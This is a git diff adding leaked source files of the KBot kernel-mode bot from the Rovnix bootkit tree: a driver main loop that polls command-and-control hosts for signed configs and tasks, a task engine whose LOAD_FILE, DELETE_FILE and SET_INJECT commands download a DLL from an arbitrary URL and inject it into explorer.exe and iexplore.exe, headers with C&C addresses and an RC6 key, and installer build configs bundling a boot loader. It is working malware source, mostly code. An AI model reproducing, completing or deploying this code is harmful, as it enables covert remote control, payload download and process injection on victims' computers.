diff --git a/Rovnix/_DUMP/a00c81cdc72e6720ecb82349ae1166614853e05c.svn-base b/Rovnix/_DUMP/a00c81cdc72e6720ecb82349ae1166614853e05c.svn-base
new file mode 100644
index 000000000..a64579f03
--- /dev/null
+++ b/Rovnix/_DUMP/a00c81cdc72e6720ecb82349ae1166614853e05c.svn-base
@@ -0,0 +1,371 @@
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+// KBot project.
+//	
+// module: kbot.c
+// $Revision: 32 $
+// $Date: 2012-07-04 15:11:26 +0400 (Ср, 04 июл 2012) $
+// description: 
+//	Kernel-mode client program.
+//	Connects over the KIP to one of the specified C&C servers and receives specially formed configuration files and commands.
+
+#include <Ntifs.h>
+#include <ntddk.h>
+#include <ntimage.h>
+#define NTSTRSAFE_NO_DEPRECATE
+#include <ntstrsafe.h>
+
+#include "version.h"
+#include "ntddkex.h"
+#include "kdbg.h"
+#include "bklib.h"
+
+#include "..\bkdrv\bkdrv.h"
+#include "..\bklib\fssup.h"
+#include "..\fslib\vfat.h"
+#include "..\fslib\fslib.h"
+
+#include "inaddr.h"
+#include "..\inc\kipapi.h"
+#include "..\khttp\khttp.h"
+
+#include "..\kiplib\kstream.h"
+#include "..\crypto\crypto.h"
+
+#include "joiner.h"
+#include "kbot.h"
+#include "kbotinc.h"
+
+KEVENT			g_KBotShutdownEvent = {0};
+PCHAR			g_KbotPublicKey = NULL;
+PCHAR			g_KbotUserAgent = NULL;
+
+PVOID	KBotAlloc(ULONG	Size)
+{
+	return(MyAllocatePool(PagedPool, Size));
+}
+
+VOID	KBotFree(PVOID	Mem)
+{
+	MyFreePool(Mem);
+}
+
+// ---- Following routines are used by CRYPTO library ---------------------------------------------------------------------
+
+ULONG	__stdcall AppRand(VOID)
+{
+	LARGE_INTEGER TickCount;
+	KeQueryTickCount(&TickCount);
+	return(TickCount.LowPart);
+}
+// --------------------------------------------------------------------------------------------------------------------------
+
+
+
+ULONG	KBotSelectHost(ULONG OldIndex)
+{
+	if (OldIndex == g_KBotConfig->HostIndex)
+	{
+		g_KBotConfig->HostIndex += 1;
+		if (g_KBotConfig->HostIndex == g_KBotConfig->HostCount)
+			g_KBotConfig->HostIndex = 0;
+	}
+	return(g_KBotConfig->HostIndex);
+}
+
+NTSTATUS KBotCommonRequest(
+	PCHAR	ScriptUri,	// Target script name template
+	PCHAR	Method,		// HTTP Method
+	PCHAR*	pBuffer,	// Pointer to a variable that receives pointer to a buffer with data
+	PULONG	pSize,		// Pointer to a variable that receives size of the buffer
+	ULONG	Crc			// CRC parameter of the request
+	)
+{
+	NTSTATUS ntStatus = STATUS_INSUFFICIENT_RESOURCES;
+	ULONG	bSize, HostIndex = KBotSelectHost(INVALID_INDEX);
+	PCHAR	RequestStr, ParamStr, Uri, Buffer, ScriptName;
+	PGUID_EX	Id;
+	
+	Id = (PGUID_EX)&g_KBotUserId.Id;
+
+	if (ParamStr = KBotAlloc(PAGE_SIZE))
+	{
+		if (Crc == 0)
+			Crc = RsaRandom(AppRand());
+
+		bSize = sprintf(ParamStr, szRequestFmt, KBOT_VERSION, Id->Part0, Id->Part1, Id->Part2, Id->Part3, 
+			g_KBotConfig->ServerId, g_KBotConfig->GroupId, Crc);
+
+		ASSERT(bSize < PAGE_SIZE);
+
+#ifdef _ENCRYPT_REQUEST_URI
+		if (ScriptName = GenScriptLine(ScriptUri))
+		{
+			if (RequestStr = ObfuscateParamStr(ParamStr, (PRC6_KEY)g_KBotConfig->pKey))
+			{
+				strtrim(RequestStr, "\r\n");
+#else
+				ScriptName = ScriptUri;
+				RequestStr = ParamStr;
+#endif
+				if (Uri = KBotAlloc(strlen(RequestStr) + strlen(ScriptName) + 1))
+				{	
+					strcpy(Uri, ScriptName);
+					strcat(Uri, RequestStr);
+
+					ntStatus = KBotRequest(g_KBotConfig->HostArray[HostIndex], Uri, Method, pBuffer, pSize);
+					if (!NT_SUCCESS(ntStatus))
+					{
+						ULONG	NewIndex = KBotSelectHost(HostIndex);
+						if (HostIndex != NewIndex)
+							ntStatus = KBotRequest(g_KBotConfig->HostArray[NewIndex], Uri, Method, pBuffer, pSize);
+					}
+					KBotFree(Uri);
+				}	// if (pUri = KBotAlloc(bSize + strlen(ScriptName) + 1))
+#ifdef _ENCRYPT_REQUEST_URI
+				AppFree(RequestStr);
+			}
+			AppFree(ScriptName);
+		}
+#endif
+		KBotFree(ParamStr);
+	}	// if (ParamStr = KBotAlloc(PAGE_SIZE))
+
+	return(ntStatus);
+}
+
+
+//
+//	Requests a file using the specified script URI.
+//	Verifies the file digital signture.
+//
+static NTSTATUS KBotRequestAndCheckFile(
+	PCHAR	ScriptUri,	// Target script name template
+	PCHAR*	pBuffer,	// Pointer to a variable that receives pointer to a buffer with file data
+	PULONG	pSize,		// Pointer to a variable that receives size of the file buffer
+	ULONG	Crc,		// CRC parameter of the request
+	BOOL	bUnsign		// Specify TRUE if the unsigned data should be returned, otherwise returns original data
+	)
+{
+	NTSTATUS	ntStatus = STATUS_SUCCESS;
+	PCHAR		Buffer;
+	ULONG		Size = 0;
+
+	if (NT_SUCCESS(ntStatus = KBotCommonRequest(ScriptUri, szGet, &Buffer, &Size, Crc)))
+	{
+#ifdef	_USE_DIGITAL_SIGNATURE
+		if (Size)
+		{
+			PCHAR	uBuffer;
+			ULONG	uSize;
+			// Try to check the received file digital signature.
+			// Return STATUS_SYSTEM_IMAGE_BAD_SIGNATURE if we have no valid public key or the file is not properly signed.
+			if (!g_KbotPublicKey || !(uSize = DsUnsign(Buffer, Size, &uBuffer, g_KbotPublicKey)))
+			{
+				// Signature verification failed
+				ntStatus = STATUS_SYSTEM_IMAGE_BAD_SIGNATURE;
+				KBotFree(Buffer);
+			}
+			else
+			{
+				if (bUnsign)
+				{
+					KBotFree(Buffer);
+					Buffer = uBuffer;
+					Size = uSize;
+				}
+			}
+		}	// if (Size)
+#endif
+		*pBuffer = Buffer;
+		*pSize = Size;
+	}	// if (NT_SUCCESS(ntStatus = KBotCommonRequest(ScriptUri, szGet, &Buffer, &Size, Crc)))
+
+	return(ntStatus);
+}
+
+
+
+//
+//	Thread function.
+//	Requests config and task by a timer in a loop.
+//
+VOID	KBotMainThread(PVOID Context)
+{
+	KTIMER	ConfigTimer;
+	KTIMER	TaskTimer;
+	PVOID	WaitObjects[3] = {&g_KBotShutdownEvent, &ConfigTimer, &TaskTimer};
+	NTSTATUS	ntStatus;
+	LARGE_INTEGER	Period;
+	ANSI_STRING		aConfigName = RTL_CONSTANT_STRING(szKBotConfigFileName);
+
+	ENTER_WORKER();
+
+	KdPrint(("KBOT: main thread started.\n"));
+
+	KeInitializeTimer(&ConfigTimer);
+	KeInitializeTimer(&TaskTimer);
+
+	Period.QuadPart = _RELATIVE(_MILLISECONDS(KBOT_WAIT_BEFORE_START));
+	KeSetTimer(&ConfigTimer, Period, NULL);
+	KeSetTimer(&TaskTimer, Period, NULL);
+
+	do	// main loop
+	{
+		PCHAR	Buffer = NULL;
+		ULONG	bSize = 0;
+
+		ntStatus = KeWaitForMultipleObjects(3, (PVOID*)&WaitObjects, WaitAny, Executive, KernelMode, FALSE, NULL, NULL);
+
+		if (ntStatus < STATUS_WAIT_1 || ntStatus > STATUS_WAIT_2)
+			// g_KBotShutdownEvent signaled or any error occured, exiting
+			break;
+
+		if (ntStatus == STATUS_WAIT_1)
+		{
+			// Config timer expired
+			ULONG ConfigCRC = g_KBotConfig->ConfigCRC;
+
+			if (ConfigCRC == 0)
+				ConfigCRC = AppRand();
+
+			// Requesting a config
+			if (NT_SUCCESS(ntStatus = KBotRequestAndCheckFile(szConfigUri, &Buffer, &bSize, ConfigCRC, FALSE)))
+			{
+				if (bSize)
+				{
+					// Config file received
+					KdPrint(("KBOT: config file of %u bytes received\n", bSize));
+					if (NT_SUCCESS(FsSaveFile(&aConfigName, Buffer, bSize)))
+						KBotLoadConfig();
+					KBotFree(Buffer);
+				}
+				Period.QuadPart = _RELATIVE(_SECONDS(g_KBotConfig->ConfigPeriod));
+			}
+			else
+			{
+				KdPrint(("KBOT: Config request failed with status 0x%X\n", ntStatus));
+				Period.QuadPart = _RELATIVE(_SECONDS(g_KBotConfig->MinimumPeriod));
+			}
+
+			KeSetTimer(&ConfigTimer, Period, NULL);
+		}
+		else if (ntStatus == STATUS_WAIT_2)
+		{
+			// Task timer expired
+			if (NT_SUCCESS(ntStatus = KBotRequestAndCheckFile(szTaskUri, &Buffer, &bSize, AppRand(), TRUE)))
+			{
+				if (bSize)
+				{
+					// Task file received
+					KdPrint(("KBOT: task file of %u bytes received\n", bSize));
+					ProcessTaskFile(Buffer, bSize, FALSE);
+					KBotFree(Buffer);
+				}
+				Period.QuadPart = _RELATIVE(_SECONDS(g_KBotConfig->TaskPeriod));
+			}
+			else
+			{
+				KdPrint(("KBOT: Task request failed with status 0x%X\n", ntStatus)); 
+				Period.QuadPart = _RELATIVE(_SECONDS(g_KBotConfig->MinimumPeriod));
+			}
+
+			KeSetTimer(&TaskTimer, Period, NULL);
+		}
+
+	} while(TRUE);
+
+	LEAVE_WORKER();
+
+	UNREFERENCED_PARAMETER(Context);
+}
+
+//
+//	Initializes KBOT user-agent string used in HTTP requests.
+//	This string contains machine architecture, OS version and default browser.
+//
+BOOL KBotInitUserAgent(VOID)
+{
+	BOOL	Ret = FALSE;
+	ULONG	i, OsMajorVersion, OsMinorVersion, OsBuildNumber;
+	PCHAR	pArch = "";
+
+	if (g_KbotUserAgent = KBotAlloc(cstrlenA(szUserAgentFmt) + cstrlenA(szX64) + 8))
+	{
+		PsGetVersion(&OsMajorVersion, &OsMinorVersion, &OsBuildNumber, NULL);
+#ifdef _WIN64
+		pArch = szX64;
+#endif
+		i = sprintf(g_KbotUserAgent, szUserAgentFmt, OsMajorVersion, OsMinorVersion, pArch);
+		ASSERT(i < (cstrlenA(szUserAgentFmt) + cstrlenA(szX64) + 8));
+
+		Ret = TRUE;
+	}
+	return(Ret);
+}
+
+
+
+// ---- Startup and clenup ---------------------------------------------------------------------------------------------------
+
+VOID		KBotCleanup(VOID)
+{
+	// Check if g_KBotShutdownEvent initialized...
+	if (g_KBotShutdownEvent.Header.Type)
+		// ...then set it to notify all workers
+		KeSetEvent(&g_KBotShutdownEvent, IO_NO_INCREMENT, FALSE);
+
+	if (g_KbotPublicKey)
+		AppFree(g_KbotPublicKey);
+
+	if (g_KbotUserAgent)
+		KBotFree(g_KbotUserAgent);
+}
+
+
+NTSTATUS	KBotStartup(VOID)
+{
+	NTSTATUS	ntStatus = STATUS_INSUFFICIENT_RESOURCES;
+	HANDLE		hThread;
+	ULONG		Size;
+	OBJECT_ATTRIBUTES	oa = {0};
+
+	KdPrint(("KBOT version 1.0 started.\n"));
+
+	do	// not a loop
+	{
+		if (!KBotInitUserAgent())
+			break;
+
+		// Initializing HTTP client
+		if (!KHttpInit(&KBotAlloc, &KBotFree))
+			break;
+	
+		// Initializing g_KBotShutdownEvent
+		KeInitializeEvent(&g_KBotShutdownEvent, NotificationEvent, FALSE);
+
+		if (!GetJoinedData((PIMAGE_DOS_HEADER)BkImageBase, &g_KbotPublicKey, &Size, FALSE, CRC_PUBLIC_KEY, 0))
+			g_KbotPublicKey = NULL;
+
+		// Loading or creating user ID
+		KBotGetUserId();
+
+		// Loading or initializing config
+		if (!(NT_SUCCESS(ntStatus = KBotLoadConfig())))
+			break;
+
+		// Initializing and starting client main thread
+		InitializeObjectAttributes(&oa, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
+		ntStatus = PsCreateSystemThread(&hThread, GENERIC_ALL, &oa, NULL, NULL, &KBotMainThread, NULL);
+
+		if (NT_SUCCESS(ntStatus))
+			ZwClose(hThread);
+		
+	} while(FALSE);
+
+	KdPrint(("KBOT: startup complete with status 0x%X\n", ntStatus));
+
+	if (!(NT_SUCCESS(ntStatus)))
+		KBotCleanup();
+
+	return(ntStatus);
+}
\ No newline at end of file
diff --git a/Rovnix/_DUMP/a07f4bbbb21ca550a63641c413660e0f27cdff00.svn-base b/Rovnix/_DUMP/a07f4bbbb21ca550a63641c413660e0f27cdff00.svn-base
new file mode 100644
index 000000000..6126bead2
--- /dev/null
+++ b/Rovnix/_DUMP/a07f4bbbb21ca550a63641c413660e0f27cdff00.svn-base
@@ -0,0 +1,230 @@
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+// KBot project.
+//	
+// module: tasks.c
+// $Revision: 35 $
+// $Date: 2012-08-23 16:20:51 +0400 (Чт, 23 авг 2012) $
+// description: 
+//	Tasks processing engine.
+
+#include <Ntifs.h>
+#include <ntddk.h>
+#include <ntimage.h>
+#define NTSTRSAFE_NO_DEPRECATE
+#include <ntstrsafe.h>
+
+#include "version.h"
+#include "ntddkex.h"
+#include "kdbg.h"
+#include "bklib.h"
+
+#include "..\fslib\fslib.h"
+#include "..\bkdrv\bkdrv.h"
+
+#include "..\kloader\kloader.h"
+
+#include "kbot.h"
+#include "kbotinc.h"
+#include "tasks.h"
+
+
+//
+//	Processes LOAD_FILE command.
+//	Loads a file by HTTP from the specified URL and saves it into the VFS with the specified name.
+//
+static NTSTATUS CmdLoadFile(
+	PCHAR CmdLine
+	)
+{
+	PCHAR	Buffer, Host, Uri, URL = NULL, Name = NULL;
+	ULONG	bSize, NumberParams = ParseCommandLine(CmdLine, &URL, &Name, NULL, NULL);
+	NTSTATUS	ntStatus = STATUS_INVALID_PARAMETER;
+	ANSI_STRING	aName;
+
+	do	// not a loop
+	{
+		if (NumberParams == 0)
+			break;
+
+		if (Name == NULL || *Name == 0)
+		{
+			if (Name = strrchr(URL, '/'))
+				Name += 1;
+		}
+
+		if (!Name)
+			break;
+
+		// Splitting URL into Host and URI
+		if (Uri = strchr(URL, '/'))
+		{			
+			if (Uri[1] == '/')
+			{				
+				URL = Uri + 2;
+				Uri = strchr(URL, '/');
+			}
+
+			if (!Uri)
+				break;
+		}	// if (Uri = strchr(URL, '/'))
+		else
+			break;
+
+		if (!(Host = KBotAlloc((ULONG)(Uri - URL) + 1)))
+		{
+			ntStatus = STATUS_INSUFFICIENT_RESOURCES;
+			break;
+		}
+
+		*Uri = 0;
+		strcpy(Host, URL);
+		*Uri = '/';
+
+		ntStatus = KBotRequest(Host, Uri, szGet, &Buffer, &bSize);
+		KBotFree(Host);
+
+		if (!NT_SUCCESS(ntStatus) || bSize == 0)
+			break;
+
+		RtlInitAnsiString(&aName, Name);
+		ntStatus = FsSaveFile(&aName, Buffer, bSize);
+
+		KBotFree(Buffer);
+
+	} while(FALSE);
+
+	return(ntStatus);
+}
+
+// 
+//	Processes DELETE_FILE command.
+//	Deletes the specified file from the VFS.
+//
+static NTSTATUS CmdDeleteFile(
+	PCHAR CmdLine
+	)
+{
+	NTSTATUS	ntStatus = STATUS_INVALID_PARAMETER;
+	PCHAR		Name = NULL;
+	ULONG		NumberParams = ParseCommandLine(CmdLine, &Name, NULL, NULL, NULL);
+	ANSI_STRING	aName;
+
+	if (NumberParams != 0 && Name != NULL && *Name != 0)
+	{
+		RtlInitAnsiString(&aName, Name);
+		ntStatus = FsDeleteFile(&aName);
+	}
+
+	return(ntStatus);
+}
+
+
+static NTSTATUS CmdSetInject(
+	PCHAR CmdLine
+	)
+{
+	return(KldrAddInjectConfig(CmdLine));
+}
+
+
+static NTSTATUS ProcessCommandLine(
+	PCHAR CmdLine
+	)
+{
+	PCHAR	Command, Parameters = NULL;
+	ULONG	CmdLen;
+	ULONG	CmdHash = 0;
+	NTSTATUS	ntStatus = STATUS_INVALID_PARAMETER;
+
+	KdPrint(("KBOT: processing command line \"%s\"\n", CmdLine));
+
+	do	// not a loop
+	{
+		if (!ParseCommandLine(CmdLine, &Command, &Parameters, NULL, NULL) || Parameters == NULL)
+			break;
+
+		strtrim(Parameters, " =");
+		CmdLen = strlen(Command);
+		CmdHash = BkCRC32(Command, CmdLen);
+
+		switch(CmdHash)
+		{
+		case CRC_LOAD_FILE:
+			ntStatus = CmdLoadFile(Parameters);
+			break;
+		case CRC_DELETE_FILE:
+			ntStatus = CmdDeleteFile(Parameters);
+			break;
+		case CRC_SET_INJECT:
+			ntStatus = CmdSetInject(Parameters);
+			break;
+		default:
+			KdPrint(("KBOT: Unknown command\n"));
+			break;
+		}	// switch(CmdHash)
+		
+	} while(FALSE);
+
+#if _DBG
+	if (NT_SUCCESS(ntStatus))
+		KdPrint(("KBOT: command processed\n"));
+	else if (ntStatus == STATUS_INVALID_PARAMETER)
+		KdPrint(("KBOT: invalid command line\n"));
+	else
+		KdPrint(("KBOT: command failed, status: %x\n", ntStatus));
+#endif
+
+	return(ntStatus);
+}
+
+
+NTSTATUS ProcessTaskFile(
+	PCHAR	Buffer, 
+	ULONG	bSize,
+	BOOL	bMustSucceed
+	)
+{
+	PCHAR NewBuffer, CmdLine;
+	ULONG i = 0;
+	NTSTATUS	ntStatus = STATUS_INSUFFICIENT_RESOURCES;
+
+	// Allocating new buffer for the task file and adding extra NULL-chat to it's end.
+	if (NewBuffer = KBotAlloc(bSize + 1))
+	{
+		memcpy(NewBuffer, Buffer, bSize);
+		NewBuffer[bSize] = 0;
+
+		Buffer = NewBuffer;
+		CmdLine = NewBuffer;
+
+		while(Buffer[i])
+		{
+			while(Buffer[i])
+			{	// check if there are end of line (EOFL) chars
+				if (Buffer[i] == 10 || Buffer[i] == 13)
+				{	// replace all EOFL chars with 0
+					do
+					{
+						Buffer[i] = 0;
+						i+=1;
+					} while(Buffer[i] == 10 || Buffer[i] == 13);
+					break;
+				}	
+				i+=1;
+			}	// while(CmdStrings[i])
+
+			CmdLine = strtrim(CmdLine, " \t");
+			if (*CmdLine != ';')
+			{
+				// Process single command
+				ntStatus = ProcessCommandLine(CmdLine);
+				if (!NT_SUCCESS(ntStatus) && bMustSucceed)
+					break;
+			}
+			CmdLine = &Buffer[i];
+		}	// while(CmdStrings[i])
+		KBotFree(NewBuffer);
+	}	// if (CmdLine = KBotAlloc(bSize + 1))	
+
+	return(ntStatus);
+}
\ No newline at end of file
diff --git a/Rovnix/_DUMP/a57f6b893f4ed542a67bb36ff2c1b9eb3616894d.svn-base b/Rovnix/_DUMP/a57f6b893f4ed542a67bb36ff2c1b9eb3616894d.svn-base
new file mode 100644
index 000000000..fa9ba9427
--- /dev/null
+++ b/Rovnix/_DUMP/a57f6b893f4ed542a67bb36ff2c1b9eb3616894d.svn-base
@@ -0,0 +1,24 @@
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+// KBot project.
+//	
+// module: tasks.h
+// $Revision: 13 $
+// $Date: 2012-02-20 18:55:12 +0400 (Пн, 20 фев 2012) $
+// description: 
+//	Tasks processing engine.
+
+// Command CRC32 hashes
+#define	CRC_LOAD_FILE		0x8655a116
+#define	CRC_DELETE_FILE		0x7aa3ded9
+#define	CRC_SET_INJECT		0x249c4b3d
+#define	CRC_GET_INJECT		0x0ad96aaf
+
+
+// Supported commands
+// Note that command names are case-sensitive, but command parameters are not.
+
+// LOAD_FILE http://myhost.com/myfile.dll myfile32.dll	- downloads file http://myhost.com/myfile.dll and saves it to the VFS 
+//	as \MYFILE32.DLL
+// DELETE_FILE	myfile32.dll							- deletes file \MYFILE32.DLL from the VFS
+// SET_INJECT	myfile32.dll explorer.exe iexplore.exe	- requests the KLOADER to inject \MYFILE32.DLL into the specified processes
+
diff --git a/Rovnix/_DUMP/acb825dea26f9d507358df3cfd5842da35421bf7.svn-base b/Rovnix/_DUMP/acb825dea26f9d507358df3cfd5842da35421bf7.svn-base
new file mode 100644
index 000000000..10434f977
--- /dev/null
+++ b/Rovnix/_DUMP/acb825dea26f9d507358df3cfd5842da35421bf7.svn-base
@@ -0,0 +1,91 @@
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+// KBot project.
+//	
+// module: kbot.h
+// $Revision: 33 $
+// $Date: 2012-07-16 18:27:23 +0400 (Пн, 16 июл 2012) $
+// description: 
+//	Kernel-mode client program.
+//	Connects over the KIP to one of the specified C&C servers and receives specially formed configuration files and commands.
+
+#define		_ENCRYPT_REQUEST_URI		TRUE
+#define		_USE_DIGITAL_SIGNATURE		TRUE
+
+#define		KBOT_VERSION				0x100
+
+#define		KBOT_WAIT_BEFORE_START		10		// milliseconds
+
+#define		KBOT_DEFAULT_CONFIG_PERIOD	60		// seconds
+#define		KBOT_DEFAULT_TASK_PERIOD	60		// seconds
+#define		KBOT_MINIMUM_REQUEST_PERIOD	60		// seconds
+
+#define		KBOT_CONTENT_BUFFER_SIZE	0x1000	// bytes
+
+#define		szKBotConfigFileName		"KBOT.INI"
+#define		szKBotUserIdFileName		"USER.ID"
+
+#define		CRC_PUBLIC_KEY				0xe1285e64
+#define		CRC_KBOT_INI				0x507fbe32
+#define		CRC_GROUP					0x656b798a
+#define		CRC_TASK_PERIOD				0x7c440bb2
+#define		CRC_CONFIG_PERIOD			0x986016fd
+#define		CRC_HOSTS					0xd0665bf6
+#define		CRC_KEY						0xe3c816dc
+
+#define		szRequestFmt		"version=%u&user=%x%x%x%x&server=%u&id=%u&crc=%x"
+#define		szUserAgentFmt		"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT %1u.%1u;%s SV1)"
+#define		szX64				" x64;"
+
+#ifdef _ENCRYPT_REQUEST_URI
+	#define	SERVER_DEFAULT_KEY		"0123456789ABCDEF"
+
+	#define		szConfigUri			"/c%s.php?%s="
+	#define		szTaskUri			"/t%s.php?%s="
+#else
+	#define		szConfigUri			"/config.php?"
+	#define		szTaskUri			"/task.php?"
+#endif
+
+#define		KBOT_DEFAULT_HOST_LIST	" 10.30.29.241 "
+#define		INVALID_INDEX		(-1)
+
+
+typedef struct	_KBOT_CONFIG
+{
+#if DBG
+	ULONG	Magic;
+#endif
+	ULONG	ConfigCRC;
+
+	ULONG	ConfigPeriod;	// seconds
+	ULONG	TaskPeriod;		// seconds
+	ULONG	MinimumPeriod;	// seconds
+
+	ULONG	ServerId;
+	ULONG	GroupId;
+
+	PCHAR*	HostArray;
+	PCHAR	pHostList;
+	ULONG	HostCount;
+	ULONG	HostIndex;
+
+	PCHAR	pKey;
+} KBOT_CONFIG, *PKBOT_CONFIG;
+
+typedef struct _KBOT_USER
+{
+	GUID	Id;				// current user ID
+} KBOT_USER, *PKBOT_USER;
+
+#define		KBOT_CONFIG_MAGIC		'TOBK'
+#define		ASSERT_KBOT_CONFIG(x)	ASSERT(x->Magic == KBOT_CONFIG_MAGIC)
+
+#define		KBOT_DEFAULT_SERVER_ID	12
+#define		KBOT_DEFAULT_GROUP_ID	1012
+
+
+PCHAR		g_KbotUserAgent;
+
+
+NTSTATUS	KBotStartup(VOID);
+VOID		KBotCleanup(VOID);
\ No newline at end of file
diff --git a/Rovnix/_DUMP/d22b5fccfd1d2dfa72dde85bd2eaef39ff2b795e.svn-base b/Rovnix/_DUMP/d22b5fccfd1d2dfa72dde85bd2eaef39ff2b795e.svn-base
new file mode 100644
index 000000000..d32bc5cf9
--- /dev/null
+++ b/Rovnix/_DUMP/d22b5fccfd1d2dfa72dde85bd2eaef39ff2b795e.svn-base
@@ -0,0 +1,27 @@
+TARGETNAME = kbot
+TARGETTYPE = DRIVER_LIBRARY
+
+!IF $(FREEBUILD)
+TARGETPATH=..\lib\Release
+TARGETPATHLIB=..\lib\Release
+!ELSE
+TARGETPATH=..\lib\Debug
+TARGETPATHLIB=..\lib\Debug
+!ENDIF
+
+
+BUFFER_OVERFLOW_CHECKS=0
+C_DEFINES=$(C_DEFINES) /Gz
+
+!IF $(FREEBUILD)
+MSC_OPTIMIZATION = /O1 /Oi
+MSC_WARNING_LEVEL=/W3 /WX
+MSC_STDCALL = 1
+!ENDIF
+
+INCLUDES=	..\inc
+
+SOURCES=	kbot.c		\
+			config.c	\
+			tasks.c		\
+			sendrecv.c
diff --git a/Rovnix/_DUMP/d5c1d6905845df042a43e0c0db166725bac4ea70.svn-base b/Rovnix/_DUMP/d5c1d6905845df042a43e0c0db166725bac4ea70.svn-base
new file mode 100644
index 000000000..81dd71f58
--- /dev/null
+++ b/Rovnix/_DUMP/d5c1d6905845df042a43e0c0db166725bac4ea70.svn-base
@@ -0,0 +1,22 @@
+; Êîíôèãóðàöèîííûé ôàéë äëÿ ïðîãðàììû KBOT
+; Ýòîò ôàéë ìîæåò áûòü ïðèêðåïëåí ê äðàéâåðó ïðè ïîìîùè óòèëèòû FJ.
+; Ïðè ñòàðòå, ïðîãðàììà èùåò ýòîò ôàéë íà VFS, çàòåì â äðàéâåðå.
+
+; Ñïèñîê õîñòîâ äëÿ ïîèñêà óïðàâëÿþùåãî ñåðâåðà. Èìåíà ðàçäåëÿþòñÿ çàïÿòûìè.
+Hosts = 10.30.22.114
+
+; ID ãðóïïû áîòà. Ëþáîå ÷èñëî íå áîëüøå 2147483647.
+Group = 1000
+
+; RC6-êëþ÷ äëÿ îáôóñêàöèè çàïðîñîâ ê ñåðâåðó.
+; Íåçàâèñèìî îò äëèííû ñòðîêè èñïîëüçóþòñÿ òîëüêî ïåðâûå 16 áàéò.
+; Åñëè êëþ÷ ìåíüøå 16 áàéò, òî ïðîãðàììà äîïîëíèò åãî íóëÿìè.
+Key = 0123456789ABCDEF
+
+; Êàê ÷àñòî çàïðàøèâàòü êîíôèã (ñåê).
+ConfigPeriod = 60
+
+; Êàê ÷àñòî çàïðàøèâàòü çàäà÷ó (ñåê).
+TaskPeriod = 60
+
+
diff --git a/Rovnix/_DUMP/e19909da33e75132d50f2bef8a222ba4ad243aeb.svn-base b/Rovnix/_DUMP/e19909da33e75132d50f2bef8a222ba4ad243aeb.svn-base
new file mode 100644
index 000000000..6893fe9e9
Binary files /dev/null and b/Rovnix/_DUMP/e19909da33e75132d50f2bef8a222ba4ad243aeb.svn-base differ
diff --git a/Rovnix/_DUMP/e3424d3927016883e3a9c8036856f8643f2089f2.svn-base b/Rovnix/_DUMP/e3424d3927016883e3a9c8036856f8643f2089f2.svn-base
new file mode 100644
index 000000000..473418ac0
--- /dev/null
+++ b/Rovnix/_DUMP/e3424d3927016883e3a9c8036856f8643f2089f2.svn-base
@@ -0,0 +1,31 @@
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+// KBot project.
+//	
+// module: kbotinc.h
+// $Revision: 35 $
+// $Date: 2012-08-23 16:20:51 +0400 (Чт, 23 авг 2012) $
+// description: 
+//	Project common structures and definitions.
+
+
+#define			szGet			"GET"
+
+// from kbot.c
+
+PCHAR	g_KbotPublicKey;
+PVOID	KBotAlloc(ULONG	Size);
+VOID	KBotFree(PVOID	Mem);
+
+// from sendrecv.c
+NTSTATUS KBotRequest(PCHAR	Host, PCHAR	Uri, PCHAR	Method, PCHAR*	pBuffer, PULONG	pSize);
+
+// from tasks.c
+NTSTATUS ProcessTaskFile(PCHAR Buffer, ULONG bSize, BOOL bMustSucceed);
+
+// from config.c
+PKBOT_CONFIG volatile	g_KBotConfig;
+KBOT_USER				g_KBotUserId;
+
+NTSTATUS	KBotLoadConfig(VOID);
+VOID		KBotGetUserId(VOID);
+
diff --git a/Rovnix/_DUMP/e4c23fad23de4586c1770b2be5df0ed2726df970.svn-base b/Rovnix/_DUMP/e4c23fad23de4586c1770b2be5df0ed2726df970.svn-base
new file mode 100644
index 000000000..b1f71e638
--- /dev/null
+++ b/Rovnix/_DUMP/e4c23fad23de4586c1770b2be5df0ed2726df970.svn-base
@@ -0,0 +1,32 @@
+; Êîíôèãóðàöèîííûé ôàéë äëÿ óòèëèòû FJ
+; Îïèñûâàåò äðàéâåðà è áèáëèîòåêè, êîòîðûå íåîáõîäèìî ïðèêðåïèòü ê èíñòàëëåðó
+; Ïðè çàïóñêå èíñòàëëåð îïðåäåëÿåò ðàçðÿäíîñòü ÎÑ è óñòàíàâëèâàåò ñîîòâåòñòâóþùèé äðàéâåð
+
+; Èñõîäíûé ôàéë èíñòàëëåðà (ìîæåò áûòü êàê EXE, òàê è DLL)
+SOURCE: ..\bin\Release\i386\setupdll.dll
+
+; Ôàéë, â êîòîðûé áóäåò çàïèñàí ðåçóëüòàò 
+OUT: Release\setupdll.dll
+
+; Íà÷àëüíûé çàãðóç÷èê
+BIN: Release\vbr.com
+
+
+; Äðàéâåð äëÿ 32õ-áèòíîé ÎÑ
+DRV: ..\bin\Release\i386\kloader.sys
+
+; Îòêðûòûé RSA-êëþ÷ äëÿ ïðîâåðêè ïîäïèñè ôàéëîâ
+BIN: public.key
+
+; Êîíôèãóðàöèîííûé ôàéë ìîäóëÿ KBOT
+BIN: kbot.ini
+
+
+; Äðàéâåð äëÿ 64õ-áèòíîé ÎÑ
+DRV: ..\bin\release\amd64\kloader.sys
+
+; Îòêðûòûé RSA-êëþ÷ äëÿ ïðîâåðêè ïîäïèñè ôàéëîâ
+BIN: public.key
+
+; Êîíôèãóðàöèîííûé ôàéë ìîäóëÿ KBOT
+BIN: kbot.ini
\ No newline at end of file
diff --git a/Rovnix/_DUMP/e96f819fc48f397dd8b5c1f5d4a54abfb12d730f.svn-base b/Rovnix/_DUMP/e96f819fc48f397dd8b5c1f5d4a54abfb12d730f.svn-base
new file mode 100644
index 000000000..77e816f26
--- /dev/null
+++ b/Rovnix/_DUMP/e96f819fc48f397dd8b5c1f5d4a54abfb12d730f.svn-base
@@ -0,0 +1,50 @@
+KBOT - NT-kernel bot program
+----------------------------
+
+Ïðîãðàììà ïðåäíàçíà÷åíà äëÿ ñêà÷èâàíèÿ, ïîñðåäñòâîì HTTP, ôàéëîâ, ñîõðàíèÿ èõ íà VFS è 
+ ðåãèñòðàöèè â ìîäóëå KLDR äëÿ èíæåêòà â çàäàííûå ïðîöåññû.
+ 
+Ïîääåðæèâàåìûå ÎÑ: XP - WIN7.
+Ïîääåðæèâàåìûå àðõèòåêòóðû: x86, AMD64(EM64T).
+
